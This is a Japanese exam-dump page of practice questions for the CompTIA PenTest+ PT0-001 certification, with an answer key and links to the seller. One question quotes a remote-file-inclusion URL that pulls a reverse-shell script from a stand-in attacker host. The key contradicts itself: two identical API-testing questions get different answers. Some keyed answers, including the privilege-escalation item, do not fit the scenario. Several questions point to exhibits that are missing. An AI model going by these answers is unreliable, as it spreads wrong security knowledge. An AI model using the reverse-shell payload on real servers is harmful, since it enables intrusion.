[2023年更新]PT0-001まとめセット試験ガイド練習からあなたのPT0-001試験を合格させます!
準備PT0-001試験2023年最新のCompTIA PenTest+無制限295問題
Comptia Pentest+認定は世界的に認識されており、雇用主によって高く評価されています。この認定を取得すると、政府、民間企業、ITコンサルティングおよびサービス会社、サイバーセキュリティの専門家を探している他のさまざまな業界など、さまざまな分野の個人に機会が開かれます。この認定は、脆弱性の評価と浸透テストを実施するために必要な知識とスキルを検証するため、サイバーセキュリティでのキャリアを促進しようとする個人向けに設計されています。
質問 # 56
While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?
- A. Letter of engagement and attestation of findings
- B. Risk summary and executive summary
- C. NDA and MSA
- D. SOW and final report
正解:B
質問 # 57
A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box. Which of the following techniques is suitable to attempt this?
- A. Conduct a phishing campaign.
- B. Perform ARP spoofing.
- C. Use an SSL downgrade attack.
- D. Employ NBNS poisoning.
正解:A
質問 # 58
Which of the following are MOST important when planning for an engagement? (Select TWO).
- A. Tolerance to impact
- B. Goals/objectives
- C. Architectural diagrams
- D. Company policies
- E. Storage time for a report
正解:A、B
質問 # 59
A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?
- A. Writable service
References https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#john-the-ripper---jtr - B. Insecure file permissions
- C. Application Whitelisting
- D. Shell escape
正解:B
質問 # 60
A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?
- A. W3AF
- B. Swagger
- C. WAR
- D. NiktO
正解:B
質問 # 61
Which of the following actions BEST matches a script kiddie's threat actor?
- A. Install a rootkit to maintain access to the corporate network.
- B. Deface the website of a company in search of retribution.
- C. Steal credit cards from the database and sell them in the deep web.
- D. Exfiltrate network diagrams to perform lateral movement.
正解:C
解説:
Explanation/Reference: https://www.skyetechnologies.com/2020/08/20/meet-the-threat-actors-part-1-script-kiddies/
質問 # 62
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
- A. Principle of authority
- B. Principle of likeness
- C. Principle of social proof
- D. Principle of fear
- E. Principle of scarcity
正解:A
解説:
Explanation/Reference:
質問 # 63
A penetration tester found a network with NAC enabled Which of the following commands can be used to bypass the NAC?
- A. macchanger
- B. iptafcles
- C. sslbump
正解:A
解説:
D, proxychains
質問 # 64
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
- A. Shodan
- B. Wireshark
- C. Dynamo
- D. SET
- E. Maltego
- F. BeEF
正解:A、E
解説:
Explanation
References: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/#gref
質問 # 65
A penetration tester generates a report for a host-based vulnerability management agent that is running on a production web server to gather a list of running processes. The tester receives the following information.
Which of the following processes MOST likely demonstrates a lack of best practices?
- A. systemd
- B. dbus-daemon
- C. apache2
- D. urlgrabber-ext
正解:B
質問 # 66
Click the exhibit button.
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
- A. SNMP brute forcing
- B. ARP spoofing
- C. DNS cache poisoning
- D. SMTP relay
正解:A
質問 # 67
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
正解:
解説:
質問 # 68
Given the following Python script:
Which of the following is where the output will go?
- A. To the screen
- B. To a file
- C. To a network server
- D. To /dev/null
正解:B
質問 # 69
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once
正解:
解説:
質問 # 70
A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?
- A. Swagger
- B. NiktO
- C. W3AF
- D. WAR
正解:B
質問 # 71
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
正解:
解説:
質問 # 72
Click the exhibit button.
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
- A. SNMP brute forcing
- B. ARP spoofing
- C. DNS cache poisoning
- D. SMTP relay
正解:A
質問 # 73
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
- A. nmap -p 22 -sL targets
- B. nmap -p 22 -iL targets
- C. nmap -p 22 -oG targets
- D. nmap -p 22 -oA targets
正解:B
質問 # 74
An assessor begins an internal security test of the Windows domain internal. comptia. net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?
A)
B)
C)
D)
- A. Option A
- B. Option B
- C. Option C
- D. Option D
正解:A
質問 # 75
A penetration tester is reviewing the following output from a wireless sniffer:
Which of the following can be extrapolated from the above information?
- A. Hardware vendor
- B. Usernames
- C. Key strength
- D. Channel interference
正解:B
質問 # 76
A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port The penetration tester wishes to forward that traffic back to a device Which of the following are the BEST tools to use few this purpose? (Select TWO)
- A. Cain and Abel
- B. Tcpdump
- C. Nmap
- D. Netcat
- E. Wiresrtark
- F. SSH
正解:D、F
質問 # 77
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass"
-sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
Exit
setuid
strmp
GLINC _2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?
- A. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'
- B. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
- C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw
- D. Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path "/home/user'. Then run changepass
正解:A
質問 # 78
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
- A. Stop external calls from the application.
- B. Double URL encode the parameters.
- C. Implement a blacklist.
- D. Block URL redirections.
正解:D
質問 # 79
......
注目のPT0-001まとめセット試験ガイドは最速合格できます:https://www.goshiken.com/CompTIA/PT0-001-mondaishu.html
練習するPT0-001にはGoShiken明確な練習であなたをCompTIA PenTest+ Certification Exam試験合格させます:https://drive.google.com/open?id=1gLU5h4CLqRaP0U5POw7Mm8zJlYDG5EYa